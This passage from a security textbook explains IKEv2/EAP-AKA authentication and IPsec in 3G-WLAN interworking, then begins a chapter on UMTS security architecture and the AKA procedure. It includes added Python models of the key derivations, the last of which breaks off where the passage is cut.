• Upon receiving the EAP-AKA (SIM) payload, the user verifies the AUTHr field using the public key of the PDG included in the certificate field (CERT), and answers by sending an EAP-AKA (SIM) response message encapsulated again within an IKEv2 message. From this point on, the IKEv2 messages contain only EAP-AKA (SIM) payloads, which are encrypted and integrity protected as described previously.
• The EAP-SIM or EAP-AKA exchange continues normally until an EAP-SUCCESS message (or an EAP-FAILURE in case of a failure) is sent from the AAA server to the PDG, which ends the EAP-AKA or EAP-SIM dialogue. Together with the EAP-SUCCESS message, the key MSK is sent from the AAA server to the PDG via the AAA protocol, as shown in Figure 9 (step 4).
• After finishing the EAP-AKA or EAP-SIM dialogue, the last step (step 5) of IKEv2 re-authenticates the peers in order to establish an IPsec_SA. This authentication step is necessary to defeat man-in-the-middle attacks, which might take place because the authentication protocol (e.g., EAP-SIM or EAP-AKA) runs inside the secure protocol (e.g., IKEv2). This combination creates a security hole, since the initiator and the responder have no way to verify that their peer in the authentication procedure is the entity at the other end of the outer protocol (Asokan, Niemi, & Nyberg, 2002). Thus, in order to prevent such man-in-the-middle attacks against IKEv2, both the user and the PDG have to calculate the AUTHi and the AUTHr payloads, respectively, using the MSK key that was generated by the EAP-SIM or EAP-AKA protocol. Then, the user and the PDG send each other the AUTHi and AUTHr payloads to achieve a security binding between the inner protocol (EAP-SIM or EAP-AKA) and the outer protocol (IKEv2). A client that skips this MSK-based AUTH check, or accepts an AUTHr that is not derived from the MSK, remains exposed to the tunnelled-authentication attack.



Note that together with the AUTHr payload the PDG also sends its traffic selector payloads (TSi and TSr), the SAr2 payload, which contains the chosen cryptographic suite for the IPsec_SA, and the assigned user's remote IP address in the Configuration Payload Reply (CP-REPLY) payload.
After the establishment of the IPsec_SA, the keying material (KEYMAT) for this SA is calculated as follows:

KEYMAT = prf+(SK_d, Ni | Nr),   (12)

where Ni and Nr are the nonces from the IKE_SA_INIT exchange, SK_d is the key derived from the SKEYSEED value (see eq. 11), and prf+ denotes the iterated prf of IKEv2 that expands its input to the required length. The KEYMAT is used to extract the keys that the IPsec protocol uses for security purposes. Note that an IPsec_SA protects one direction of the communication between the user and the PDG only. For bidirectional secure communication, one more SA in the opposite direction is needed; IKEv2 therefore negotiates child SAs in pairs, and further pairs can be created over the established IKE_SA with the CREATE_CHILD_SA exchange, the IKEv2 counterpart of the IKEv1 phase 2.

Data Protection

After the completion of the authentication procedure and the execution of IKEv2 between the PDG and the user, a pair of IPsec_SAs has been established between these two nodes. This pair deploys a bidirectional VPN between them that allows for secure data exchange over the underlying network path. At the same time, the user has been registered with the 3G PLMN for charging and billing purposes using either the EAP-AKA or the EAP-SIM protocol.
The deployed VPN runs on top of the wireless link and extends from the user's computer to the PDG, which is located in the user's home 3G PLMN (see Figures 1 and 10). It is based on IPsec (Kent & Atkinson, 1998a), a standard for providing security at the network layer. IPsec offers two security protocols: the Authentication Header (AH) protocol (Kent & Atkinson, 1998c) and the Encapsulating Security Payload (ESP) protocol (Kent & Atkinson, 1998b). AH provides connectionless integrity, data origin authentication, and protection against replays, but it does not support confidentiality. ESP supports confidentiality, connectionless integrity, anti-replay protection, and optional data origin authentication. Both AH and ESP support two modes of operation: transport and tunnel. The transport mode provides end-to-end protection between the communicating end points by protecting the IP packet payload only. The tunnel mode protects the entire original IP packet (both IP header and payload) and encapsulates it in the payload of a new IP packet.
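As an added illustration (it is not part of the chapter, nor code from any 3GPP or IETF implementation), the following Python model shows the two IKEv2 key derivations this section relies on: the prf+ expansion that yields KEYMAT for a child SA (eq. 12; RFC 4306 Sections 2.13 and 2.17) and the AUTH payload computed from the EAP MSK that binds the inner EAP-SIM/EAP-AKA run to the outer IKEv2 exchange (RFC 4306 Sections 2.15 and 2.16). HMAC-SHA1 is assumed as the negotiated prf; SK_d, the nonces, the MSK and the message octets are constructed test values, not a captured exchange.

```python
"""Added example (not from the chapter): IKEv2 key derivations of RFC 4306.

Covers prf+ (Section 2.13), the KEYMAT split for a CHILD_SA (Section 2.17,
eq. 12 of the chapter) and the AUTH payload computed from the EAP MSK
(Sections 2.15/2.16). HMAC-SHA1 is assumed as the negotiated prf. All keys,
nonces and message octets below are constructed test values.
"""
import hashlib
import hmac

PRF_LEN = 20                        # output size of PRF_HMAC_SHA1
KEY_PAD = b"Key Pad for IKEv2"      # literal from RFC 4306 Section 2.15


def prf(key: bytes, data: bytes) -> bytes:
    """The negotiated IKEv2 prf, here PRF_HMAC_SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def prf_plus(key: bytes, seed: bytes, length: int) -> bytes:
    """RFC 4306 2.13: T1 = prf(K, S|0x01), Tn = prf(K, T(n-1)|S|n), n <= 255."""
    if length > 255 * PRF_LEN:
        raise ValueError("prf+ cannot produce more than 255 blocks")
    out, prev, n = b"", b"", 1
    while len(out) < length:
        prev = prf(key, prev + seed + bytes([n]))
        out += prev
        n += 1
    return out[:length]


def child_sa_keys(sk_d: bytes, ni: bytes, nr: bytes, enc_len: int, integ_len: int) -> dict:
    """KEYMAT = prf+(SK_d, Ni | Nr) for the CHILD_SA created in IKE_AUTH (no
    additional Diffie-Hellman). Section 2.17 fixes the consumption order:
    the initiator-to-responder SA first, then the responder-to-initiator SA,
    and within each SA the encryption key before the integrity key."""
    keymat = prf_plus(sk_d, ni + nr, 2 * (enc_len + integ_len))
    keys, pos = {}, 0
    for sa in ("i2r", "r2i"):
        keys[sa + "_enc"] = keymat[pos:pos + enc_len]
        pos += enc_len
        keys[sa + "_integ"] = keymat[pos:pos + integ_len]
        pos += integ_len
    return keys


def initiator_signed_octets(real_message1: bytes, nonce_r_data: bytes,
                            rest_of_id_payload: bytes, sk_pi: bytes) -> bytes:
    """Section 2.15: InitiatorSignedOctets = RealMessage1 | NonceRData | MACedIDForI,
    with MACedIDForI = prf(SK_pi, RestOfInitIDPayload). This ties the AUTH
    value to this particular IKE_SA (its first message and nonces)."""
    return real_message1 + nonce_r_data + prf(sk_pi, rest_of_id_payload)


def eap_auth(msk: bytes, signed_octets: bytes) -> bytes:
    """Section 2.16: after EAP the 'shared secret' of Section 2.15 is the EAP MSK,
    so AUTH = prf(prf(MSK, "Key Pad for IKEv2"), <SignedOctets>)."""
    return prf(prf(msk, KEY_PAD), signed_octets)


def verify_auth(msk: bytes, signed_octets: bytes, received_auth: bytes) -> bool:
    """PDG-side check of AUTHi (the user checks AUTHr the same way over the
    responder's signed octets). A man-in-the-middle that relayed the inner
    EAP run over its own IKE_SA does not know the MSK and cannot produce a
    valid AUTH for its exchange; that is the binding this step provides."""
    return hmac.compare_digest(eap_auth(msk, signed_octets), received_auth)


if __name__ == "__main__":
    sk_d = bytes(range(20))                                   # constructed SK_d
    ni, nr = b"initiator-nonce!", b"responder-nonce!"         # constructed nonces
    keys = child_sa_keys(sk_d, ni, nr, enc_len=16, integ_len=20)
    print({k: v.hex() for k, v in keys.items()})
    msk = bytes(64)                                           # constructed EAP MSK (64 octets)
    octets = initiator_signed_octets(b"IKE_SA_INIT-request", nr,
                                     b"\x03\x00\x00\x00user@example.org", bytes(20))
    auth_i = eap_auth(msk, octets)
    print("AUTHi accepted:", verify_auth(msk, octets, auth_i))
    print("forged with wrong MSK accepted:", verify_auth(bytes(range(64)), octets, auth_i))
```

The two points a practitioner should take from the model are that KEYMAT is an expansion (prf+), not a single prf call, and that the post-EAP AUTH values depend on both the MSK and the octets of this IKE_SA, so a relay of the EAP messages through a different IKE_SA cannot be completed without the MSK.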

Figure 10. 3GPP IP access data plane



In the deployed VPN of the WLAN 3GPP IP Access scenario, IPsec employs the ESP protocol and is configured to operate in tunnel mode. Thus, the VPN provides confidentiality, integrity, data origin authentication, and anti-replay protection services covering both the payload and the header of the exchanged IP packets. Of the two IP addresses (i.e., transport and remote IP address) of each authenticated user, the remote IP address serves as the inner IP address, which is protected by IPsec, and the transport IP address serves as the IP address of the new packets, which encapsulate the original IP packets and carry them between the user and the PDG (see Figure 10). Thus, an adversary on the path cannot read the data exchanged between the user and the PDG, cannot fabricate or modify packets unnoticed, and cannot see the inner addresses, although packet sizes and timing remain observable. Finally, IPsec can use different cryptographic algorithms (e.g., DES, 3DES, AES) depending on the level of security required by the two peers and the data that they exchange; single DES is no longer considered adequate.

COMPARISON OF THE SCENARIOS

Based on the presentation of the two access scenarios (i.e., WLAN Direct IP Access and 3GPP IP Access) that integrate B3G networks and the analysis of the security measures that each one employs, this section provides a brief comparison of them. The comparison aims at highlighting the deployment advantages of each scenario and classifies them in terms of: (1) security, (2) mobility, and (3) reliability.
Regarding the provided security services, both scenarios support mutual authentication. In the WLAN Direct IP Access scenario, the authentication procedure employs either EAP-SIM or EAP-AKA, depending on the user's subscription. However, both protocols present security weaknesses, which can be exploited by adversaries to perform attacks such as identity spoofing, denial of service (DoS), replay attacks, and so forth (Arkko & Haverinen, 2006; Haverinen & Saloway, 2006). On the other hand, the authentication procedure of the 3GPP IP Access scenario is more secure, since it combines the aforementioned protocols (i.e., EAP-SIM and EAP-AKA) with IKEv2. Specifically, the PDG is authenticated using its certificate, and the user is authenticated using EAP-SIM or EAP-AKA. It is worth noting that since the EAP-SIM and EAP-AKA messages are encapsulated in protected IKEv2 messages, the weaknesses that rely on an adversary observing or injecting EAP messages on the WLAN link are mitigated, provided that the user verifies the PDG's certificate and that the AUTH payloads are bound to the MSK as described above.
Regarding confidentiality and data integrity services, both scenarios protect sensitive data conveyed over the air interface. More specifically, in the WLAN Direct IP Access scenario, strong security services are provided only when the CCMP security protocol is applied, since it incorporates the AES encryption algorithm. A downside of applying CCMP is that it requires hardware changes to the wireless APs, which might have to be replaced. In the WLAN 3GPP IP Access scenario, data encryption is applied at layer 2 (using WEP, TKIP, or CCMP) and at layer 3 (using IPsec) simultaneously (see Figure 10). This double encryption provides stronger protection to the data conveyed over the WLAN radio interface, but at the same time it may cause bandwidth consumption, longer delays, and energy consumption issues for mobile devices.
Another deployment feature which can be used for comparing the two scenarios has to do with mobility. The WLAN Direct IP Access scenario may support user mobility by employing one of the mobility protocols proposed for seamless mobility in wireless networks (Saha, Mukherjee, Misra, & Chakraborty, 2004). On the other hand, in the WLAN 3GPP IP Access scenario the established VPN between a user and the PDG adds an extra layer of complexity to the associated mobility management protocols. This complexity arises from the fact that as the mobile user moves from one access network to another and his/her IP address changes, the mobility protocols must incorporate mechanisms that dynamically maintain the established VPN, enabling the notion of a mobile VPN. An attempt to address this problem can be found in Dutta et al. (2004), who design and implement a secure universal mobility architecture which incorporates standard mobility



management protocols, such as Mobile IP, for achieving mobile VPN deployment.
Finally, the IPsec-based VPNs deployed between the users and the PDG in the 3GPP IP Access scenario may raise reliability issues. Reliability is perceived as the ability to use VPN services at all times, and it is highly related to the network connectivity and to the capacity of the underlying technology to provide VPN services. In the 3GPP IP Access scenario, all data traffic passes through the VPN tunnels that extend from the users to the PDG. The number of deployed VPNs can grow significantly, since each user can establish multiple VPNs at the same time to access different services. Thus, the PDG must be able to support a large number of simultaneous VPNs in order to provide reliable security services.

CONCLUSION

This chapter has analyzed the security architectures employed in the interworking model that integrates 3G and WLANs, materializing B3G networks. The integrated architecture of B3G networks specifies two different network access scenarios: (1) the WLAN Direct IP Access, and (2) the WLAN 3GPP IP Access. The first scenario provides a user with a connection to the public Internet or to an intranet via the WLAN-AN. In this scenario both the user and the network are authenticated to each other using EAP-SIM or EAP-AKA, depending on the user's subscription. Moreover, the confidentiality and integrity of the user's data transferred over the air interface are ensured by the 802.11i security framework. On the other hand, the WLAN 3GPP IP Access scenario allows a user to connect to the PS services (like WAP, MMS, LBS, etc.) or to the public Internet through the 3G PLMN. In this scenario, the user is authenticated to the 3G PLMN using EAP-SIM or alternatively EAP-AKA encapsulated within IKEv2, while the network is authenticated to the user using its certificate. In addition, the execution of IKEv2 is used for the establishment of an IPsec-based VPN between the user and the network that provides extra confidentiality and integrity services to the data exchanged between them.

ACKNOWLEDGMENT

Work supported by the project CASCADAS (IST-027807) funded by the FET Program of the European Commission.

REFERENCES

3rd Generation Partnership Project (3GPP) TS 22.100 (v3.7.0). (2001). UMTS Phase 1 Release '99. Sophia Antipolis Cedex, France: Author.
3rd Generation Partnership Project (3GPP) TS 03.60 (v7.9.0). (2002). GPRS service description, Stage 2. Sophia Antipolis Cedex, France: Author.
3rd Generation Partnership Project (3GPP) TS 23.234 (v7.3.0). (2006). 3GPP system to WLAN interworking. System description. Release 7. Sophia Antipolis Cedex, France: Author.
3rd Generation Partnership Project (3GPP) TS 33.234 (v7.2.0). (2006). 3G security and WLAN interworking security. System description. Release 7. Sophia Antipolis Cedex, France: Author.
Aboba, B., & Beadles, M. (1999). The network access identifier (RFC 2486). Retrieved from http://tools.ietf.org/html/rfc2486
Aboba, B., Blunk, L., Vollbrecht, J., Carlson, J., & Levkowetz, H. (2004). The extensible authentication protocol (RFC 3748). Retrieved from http://www.ietf.org/rfc/rfc3748.txt
Arkko, J., & Haverinen, H. (2006). EAP-AKA authentication (RFC 4187). Retrieved from http://www.rfc-editor.org/rfc/rfc4187.txt
Asokan, N., Niemi, V., & Nyberg, K. (2002). Man-in-the-middle in tunneled authentication protocols. Cryptology ePrint Archive, Report 2002/163. Retrieved from http://eprint.iacr.org/2002/163



Borisov, N., Goldberg, I., & Wagner, D. (2001, July). Intercepting mobile communications: The insecurity of 802.11. Paper presented at the 7th ACM/IEEE International Conference on Mobile Computing and Networking (MOBICOM), Rome, Italy.
Calhoun, P., Loughney, J., Guttman, E., Zorn, G., & Arkko, J. (2003). Diameter base protocol (RFC 3588). Retrieved from http://www.rfc-editor.org/rfc/rfc3588.txt
Dutta, A., Zhang, T., Madhani, S., Taniuchi, K., Fujimoto, K., Katsube, Y., et al. (2004, October). Secure universal mobility for wireless Internet. In Proceedings of the 2nd ACM international workshop on Wireless mobile applications and services on WLAN hotspots (WMASH), Philadelphia, PA.
Eastlake, D., & Jones, P. (2001). US secure hash algorithm 1 (SHA1) (RFC 3174). Retrieved from http://www.ietf.org/rfc/rfc3174.txt
Eronen, P. (2006). IKEv2 mobility and multihoming protocol (MOBIKE) (RFC 4555). Retrieved from http://www.ietf.org/rfc/rfc4555.txt
European Telecommunications Standards Institute (ETSI) TS 100 922 (v7.1.1). (1999). Subscriber identity modules (SIM) functional characteristics.
Harkins, D., & Carrel, D. (1998). The Internet key exchange (IKE) (RFC 2409). Retrieved from http://faqs.org/rfcs/rfc2409.html
Haverinen, H., & Saloway, J. (2006). EAP-SIM authentication (RFC 4186). Retrieved from http://www.ietf.org/rfc/rfc4186.txt
IEEE std 802.11. (1999). Wireless LAN medium access control (MAC) and physical layer (PHY) specifications.
IEEE std 802.11i. (2004). Wireless medium access control (MAC) and physical layer (PHY) specifications: Medium access control (MAC) security enhancements.
IEEE std 802.1X. (2004). Port based access control.
Kaufman, C. (2005). The Internet key exchange (IKEv2) protocol (RFC 4306). Retrieved from http://www.rfc-editor.org/rfc/rfc4306.txt
Kent, S., & Atkinson, R. (1998a). Security architecture for Internet protocol (RFC 2401). Retrieved from http://www.faqs.org/rfcs/rfc2401.html
Kent, S., & Atkinson, R. (1998b). IP encapsulating security payload (ESP) (RFC 2406). Retrieved from http://www.faqs.org/rfcs/rfc2406.html
Kent, S., & Atkinson, R. (1998c). IP authentication header (RFC 2402). Retrieved from http://www.rfc-editor.org/rfc/rfc2402.txt
Kivinen, T., & Tschofenig, H. (2006). Design of the Mobike protocol (RFC 4621). Retrieved from http://www.ietf.org/rfc/rfc4621.txt
Krawczyk, H., Bellare, M., & Canetti, R. (1997). HMAC: Keyed-hashing for message authentication (RFC 2104). Retrieved from http://www.faqs.org/rfcs/rfc2104.html
Laat, C., Gross, G., Gommans, L., Vollbrecht, J., & Spence, D. (2000). Generic AAA architecture (RFC 2903). Retrieved from http://isc.faqs.org/rfcs/rfc2903.html
Rigney, C., Rubens, A., Simpson, W., & Willens, S. (1997). Remote authentication dial in user services (RADIUS) (RFC 2138). Retrieved from http://tools.ietf.org/html/rfc2138
Saha, D., Mukherjee, A., Misra, I. S., & Chakraborty, M. (2004). Mobility support in IP: A survey of related protocols. IEEE Network, 18(6), 34-40.
Whiting, D., Housley, R., & Ferguson, N. (2003). Counter with CBC MAC (CCM) (RFC 3610). Retrieved from http://www.ietf.org/rfc/rfc3610.txt
Xenakis, C., & Merakos, L. (2004). Security in third generation mobile networks. Computer Communications, 27(7), 638-650.



KEY TERMS

Authentication, Authorization, and Accounting (AAA): AAA is a security framework which provides authentication, authorization, and accounting services. The two most prominent AAA protocols are RADIUS and Diameter.
Beyond Third Generation (B3G): B3G is the integration of heterogeneous mobile networks through an IP-based common core network.
Counter-Mode/CBC-MAC Protocol (CCMP): CCMP is a security protocol defined in 802.11i, which employs AES encryption to provide confidentiality and data integrity services.
Extensible Authentication Protocol (EAP): EAP is a security framework used to provide a plethora of authentication options, called EAP methods.
Extensible Authentication Protocol-Authentication and Key Agreement (EAP-AKA): EAP-AKA is an EAP method based on UMTS authentication of USIM cards.
Extensible Authentication Protocol method for GSM Subscriber Identity Modules (EAP-SIM): EAP-SIM is an EAP method based on GSM authentication of SIM cards.
802.11i: 802.11i is a security framework that incorporates the four-way handshake and group-key handshake for session key management and specifies the TKIP and CCMP security protocols to provide confidentiality and integrity services in 802.11 WLANs.
IKEv2: IKEv2 is a security association (SA) negotiation protocol used to establish an IPsec-based VPN tunnel between two entities.
IP security (IPsec): IPsec is a security protocol used to provide VPN services.

ENDNOTES

1. | means string concatenation and the notation n*Kc denotes the n Kc keys concatenated.
2. The notation n*RAND denotes the n RAND values concatenated.
3. The notation n*XRES denotes the n XRES values concatenated.
4. | means string concatenation.




Chapter XX
Security in UMTS 3G Mobile
Networks
Christos Xenakis
University of Piraeus, Greece

ABSTRACT

This chapter analyzes the security architecture designed for the protection of the universal mobile telecommunication system (UMTS). This architecture is built on the security principles of second generation (2G) systems with improvements and enhancements in certain points in order to provide advanced security services. The main objective of the third generation (3G) security architecture is to ensure that all information generated by or relating to a user, as well as the resources and services provided by the serving network and the home environment, are adequately protected against misuse or misappropriation. Based on the carried out analysis, the critical points of the 3G security architecture which might cause network and service vulnerability are identified. In addition, the current research on UMTS security and the proposed enhancements that aim at improving the UMTS security architecture are briefly presented and analyzed.

INTRODUCTION

The universal mobile telecommunication system (UMTS) (3rd Generation Partnership Project [3GPP] TS 23.002, 2002) is a realization of third generation (3G) networks, which intend to establish a single integrated system that supports a wide spectrum of operating environments. Users have seamless access to a wide range of new telecommunication services, such as high data rate transmission for high-speed Internet/intranet applications, independently of their location. Thus, mobile networks comprise a natural extension of the wired Internet computing world, enabling access for mobile users to multimedia services that already exist for non-mobile users and fixed networking.
Along with the variety of new perspectives, UMTS also raises new concerns on security issues. Wireless access is inherently less secure and

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Security in UMTS 3G Mobile Networks

mobility implies higher security risks compared to those encountered in fixed networks. The advanced wireless and wired network infrastructure, which supports higher access rates, and the complex network topologies, which enable "anywhere-anytime" connectivity, may increase the number and the ferocity of potential attacks. Furthermore, potential intruders are able to launch malicious attacks from mobile devices with enhanced processing capabilities, which are difficult to trace. To defeat the possible vulnerable points, UMTS has incorporated a specific security architecture, named the 3G security architecture.
This chapter analyzes the security architecture designed for the protection of UMTS. This architecture is built on the security principles of second generation (2G) systems with improvements and enhancements in certain points in order to provide advanced security services. The main objective of the 3G security architecture is to ensure that all information generated by or relating to a user, as well as the resources and services provided by the serving network (SN) and the home environment (HE), are adequately protected against misuse or misappropriation. Based on the carried out analysis, the critical points of the 3G security architecture which might cause network and service vulnerability are identified. In addition, the current research on UMTS security and the proposed enhancements that aim at improving the UMTS security architecture are briefly presented and analyzed.
The rest of this chapter is organized as follows. The next section outlines the UMTS network architecture and the 3G security architecture. The third section elaborates on the network access security features, and the fourth section examines the network domain security. The fifth section presents the user domain security, the application domain security, the visibility of security operation and configurability, and the network-wide confidentiality option. The sixth section analyzes potential weaknesses concerning the 3G security architecture, and the seventh section presents the current research on UMTS security. Finally, the last section contains the conclusions.

Figure 1. UMTS network architecture



BACKGROUND

UMTS Network

UMTS has been standardized in several releases, starting from Release 1999 (R99) and moving forward to Release 4 (Rel-4), Release 5 (Rel-5), and Release 6 (Rel-6), supporting compatibility with the evolved global system for mobile communications (GSM)/general packet radio service (GPRS) network. The UMTS network architecture includes the core network (CN), the radio access network, and the user equipment, as can be seen in Figure 1. This division provides the necessary flexibility by allowing the coexistence of different access techniques and different core network technologies, thus facilitating the migration from 2G to 3G networks. The fundamental difference between GSM/GPRS and UMTS R99 is that the latter supports higher bit rates (up to 2 Mbps). This is achieved through a new wideband code division multiple access (WCDMA) radio interface for the land-based communications system, named UMTS terrestrial radio access network (UTRAN) (3GPP TS 25.401, 2002). UTRAN consists of two distinct elements, Node B and the radio network controller (RNC). Node B converts the data flows between the Iu-b and Uu interfaces and participates in radio resource management. The RNC owns and controls the radio resources of the Nodes B connected to it. The user equipment, which mainly comprises a mobile station (MS) with limited processing, memory, and power capabilities, is connected to the UTRAN through the Uu radio interface (3GPP TS 23.002, 2002). The CN of UMTS R99 uses the network elements of GSM/GPRS, such as the home location register (HLR), the visitor location register (VLR), the authentication centre (AuC), the equipment identity register (EIR), the mobile service switching centre (MSC), the serving GPRS support node (SGSN), and the gateway GPRS support node (GGSN) (3GPP TS 23.002, 2002).

UMTS Security Architecture

3G security is built on the security principles of 2G systems, with improvements and enhancements in certain points in order to provide advanced security services. The elementary security features employed in 2G, such as subscriber authentication, radio interface encryption, and subscriber identity confidentiality, are retained and enhanced where needed. The main objective of 3G security is to ensure that all information generated by or relating to a user, as well as the resources and services provided by the SN and the HE, are adequately protected against misuse or misappropriation. The level of protection is better than that provided in

Figure 2. 3G-security Architecture


the contemporary fixed and mobile networks. The security features have been adequately standardized in order to ensure worldwide availability, interoperability, and roaming between different SNs. Furthermore, 3G security features and mechanisms can be extended and enhanced as required by new threats and services (Xenakis & Merakos, 2004b).
Figure 2 gives an overview of the 3G security architecture, illustrating five major security classes (3GPP TS 33.102, 2002):

• Network access security (I)
• Network domain security (II)
• User domain security (III)
• Application domain security (IV)
• Visibility and configurability of security (V)

NETWORK ACCESS SECURITY

Network access security is a key component in the 3G security architecture. This class deals with the set of security mechanisms that provide users with secure access to 3G services, as well as protect against attacks on the radio interface. Such mechanisms include: (1) user identity confidentiality, (2) authentication and key agreement, (3) data confidentiality, and (4) integrity protection of signaling messages. Network access security takes place independently in each service domain.

User Identity Confidentiality

User identity confidentiality allows the identification of a user on the radio access link by means of a temporary mobile subscriber identity (TMSI). This implies that the confidentiality of the user identity is protected almost always against passive eavesdroppers. Initial registration is an exceptional case where a temporary identity cannot be used, since the network does not yet know the permanent identity of the user.
The allocated temporary identity is transferred to the user once the encryption is turned on. A TMSI in the circuit switched (CS) domain or a P-TMSI in the packet switched (PS) domain has a local significance only in the location area or the routing area in which the user is registered. The association between the permanent and temporary user identities is stored in the VLR or the SGSN (VLR/SGSN). If the mobile user arrives in a new area, then the association between the permanent and the temporary identity can be fetched from the old location or routing area. If the address of the old area is not known or the connection cannot be established, then the permanent identity must be requested from the mobile user.
To avoid user traceability, which may lead to the compromise of user identity confidentiality as well as to user location tracking, the user should not be identified for a long period by means of the same temporary identity. Additionally, any signaling or user data that might reveal the user's identity are ciphered on the radio access link.

Authentication and Key Agreement

The authentication and key agreement mechanism achieves mutual authentication between the mobile user and the SN by showing knowledge of a secret key (K), and also derives ciphering and integrity keys. The authentication method is composed of a challenge/response protocol (see Figure 3) and was chosen in such a way as to achieve maximum compatibility with the GSM/GPRS security architecture, facilitating the migration from GSM/GPRS to UMTS. Furthermore, the universal subscriber identity module (USIM) (3GPP TS 22.100, 2001) and the HE keep track of the counters SQN_MS and SQN_HE, respectively, to support the network authentication. The sequence number SQN_HE is an individual counter for each user, while SQN_MS denotes the highest sequence number that the USIM has accepted. Whenever the SQN received from the HE is not in the correct range relative to SQN_MS, the mobile station decides that a synchronization failure has occurred and consequently initiates a resynchronization with the HE.
Upon receipt of a request from the VLR/SGSN, the HE authentication center (HE/AuC) forwards an ordered array of authentication vectors (AV) to the VLR/SGSN. Each AV, which is used in the authentication and key agreement procedure



Figure 3. 3G authentication and key agreement

Figure 4. Generation of authentication vectors
[Figure: the generated SQN and RAND and the field AMF are fed, together with K, to f1, f2, f3, f4, and f5, which output MAC, XRES, CK, IK, and AK, respectively; AUTN := SQN ⊕ AK || AMF || MAC; AV := RAND || XRES || CK || IK || AUTN]

between the VLR/SGSN and the USIM, consists of a random number (RAND), an expected response (XRES), a cipher key (CK), an integrity key (IK), and an authentication token (AUTN).
Figure 4 shows the AV generation by the HE/AuC. The HE/AuC starts by generating a fresh sequence number (SQN), which proves to the user that the generated AV has not been used before, and an unpredictable challenge RAND. Then, using the secret key (K), it computes:

• the message authentication code MAC = f1_K(SQN || RAND || AMF), where f1 is a message authentication function and the authentication and key management field (AMF) is used to fine-tune the performance or to bring a new authentication key stored in the USIM into use;
• the expected response XRES = f2_K(RAND), where f2 is a (possibly truncated) message authentication function;
• the cipher key CK = f3_K(RAND);
• the integrity key IK = f4_K(RAND);
• the anonymity key AK = f5_K(RAND), where f3, f4, and f5 are key generating functions;
• finally, the HE/AuC assembles the authentication token AUTN = SQN ⊕ AK || AMF || MAC.

It has to be noted that the authentication and key generation functions f1, f2, f3, f4, and f5, and the consequent AV computation, follow the one-way property. This means that if the output is known, there exists no efficient algorithm to deduce any input that would produce that output. Although the f1-f5 functions are based on the same basic algorithm, they differ from each other in a fundamental way, so that it is impossible to deduce any information about the output of one function from the output of the others. Since they are used in the AuC and in the USIM, which are both controlled by the home operator, the selection of the algorithms (f1-f5) is in principle operator specific. However, an example algorithm set has been proposed, called MILENAGE (3GPP TS 35.205, 2001).
When the VLR/SGSN initiates an authentication and key agreement procedure, it selects the next AV from the ordered array and forwards the parameters RAND and AUTN to the user. The USIM, using also the secret key (K), computes the AK, AK = f5_K(RAND), and retrieves the SQN, SQN = (SQN ⊕ AK) ⊕ AK. Then, it computes XMAC = f1_K(SQN || RAND || AMF) and checks whether the received AUTN and the retrieved SQN were indeed generated in the AuC, i.e., whether XMAC equals the received MAC and SQN lies in the acceptable range (3GPP TS 33.102, 2002). If so, the USIM computes the user response to the challenge, RES = f2_K(RAND), and triggers the mobile station (MS) to send back a user authentication response. Afterwards, the USIM computes the CK, CK = f3_K(RAND), and the IK, IK = f4_K(RAND). The VLR/SGSN compares the received RES with the XRES field of the AV. If they match, it considers that the authentication and key agreement exchange has been successfully completed. Finally, the USIM and the VLR/SGSN transfer the established encryption and integrity protection keys (CK and IK) to the mobile equipment and the RNC, which perform the ciphering and integrity functions.

Data Confidentiality

Once the user and the network have authenticated each other, they may begin secure communication. As described previously, a cipher key is shared between the core network and the terminal after a successful authentication event. User and signaling data sent over the radio interface are subject to ciphering using the function f8. The encryption/decryption process takes place in the MS and the
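The authentication and key agreement run of Figures 3 and 4 is easier to follow with the three roles side by side. The following Python model is an added example for this chapter, not 3GPP code: it plays the HE/AuC (AV generation), the USIM (AUTN verification, SQN check, RES/CK/IK derivation) and the VLR/SGSN (RES against XRES). The real f1-f5 are operator specific, so each f_i here is a stand-in built from HMAC-SHA256 with its own domain tag; the key K, AMF, the sequence numbers and the SQN acceptance window are constructed values.

```python
"""Added example (not from the chapter): a model of the UMTS AKA run of
Figures 3 and 4 with the HE/AuC, USIM and VLR/SGSN roles.

The real f1..f5 are operator specific (MILENAGE is the 3GPP example set).
Here each f_i is a stand-in built from HMAC-SHA256 with its own domain tag,
so the five outputs are independent as the text requires. Output sizes
follow TS 33.102 (MAC 64 bit, RES 64 bit here, CK/IK 128 bit, AK 48 bit).
K, AMF, the sequence numbers and the SQN window are constructed values.
"""
import hashlib
import hmac
import os

SQN_WINDOW = 1 << 28   # assumed acceptance window for SQN (not a 3GPP constant)


def _f(k: bytes, tag: bytes, data: bytes, n: int) -> bytes:
    """Stand-in for a MILENAGE function: keyed, domain separated, truncated."""
    return hmac.new(k, tag + data, hashlib.sha256).digest()[:n]


def f1(k, sqn, rand, amf): return _f(k, b"f1", sqn + rand + amf, 8)   # MAC
def f2(k, rand):           return _f(k, b"f2", rand, 8)               # RES / XRES
def f3(k, rand):           return _f(k, b"f3", rand, 16)              # CK
def f4(k, rand):           return _f(k, b"f4", rand, 16)              # IK
def f5(k, rand):           return _f(k, b"f5", rand, 6)               # AK


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class AuC:
    """HE/AuC: holds K and the per-user counter SQN_HE, emits AVs."""

    def __init__(self, k: bytes, sqn_he: int = 0, amf: bytes = b"\x00\x00"):
        self.k, self.sqn_he, self.amf = k, sqn_he, amf

    def generate_av(self, rand: bytes = None) -> dict:
        self.sqn_he += 1                                        # fresh SQN
        sqn = self.sqn_he.to_bytes(6, "big")
        rand = rand if rand is not None else os.urandom(16)     # unpredictable challenge
        mac = f1(self.k, sqn, rand, self.amf)
        ak = f5(self.k, rand)
        autn = xor(sqn, ak) + self.amf + mac                    # AUTN := SQN xor AK || AMF || MAC
        return {"rand": rand, "xres": f2(self.k, rand), "ck": f3(self.k, rand),
                "ik": f4(self.k, rand), "autn": autn}           # AV := RAND||XRES||CK||IK||AUTN


class USIM:
    """USIM: holds K and SQN_MS, the highest sequence number accepted so far."""

    def __init__(self, k: bytes, sqn_ms: int = 0):
        self.k, self.sqn_ms = k, sqn_ms

    def authenticate(self, rand: bytes, autn: bytes):
        """Returns (status, keys). Check order follows TS 33.102: MAC first,
        then SQN range. A bad MAC means the AV was not made by our AuC; an
        out-of-range SQN means a replayed AV or loss of synchronisation."""
        ak = f5(self.k, rand)
        sqn = xor(autn[:6], ak)                                 # SQN = (SQN xor AK) xor AK
        amf, mac = autn[6:8], autn[8:16]
        xmac = f1(self.k, sqn, rand, amf)
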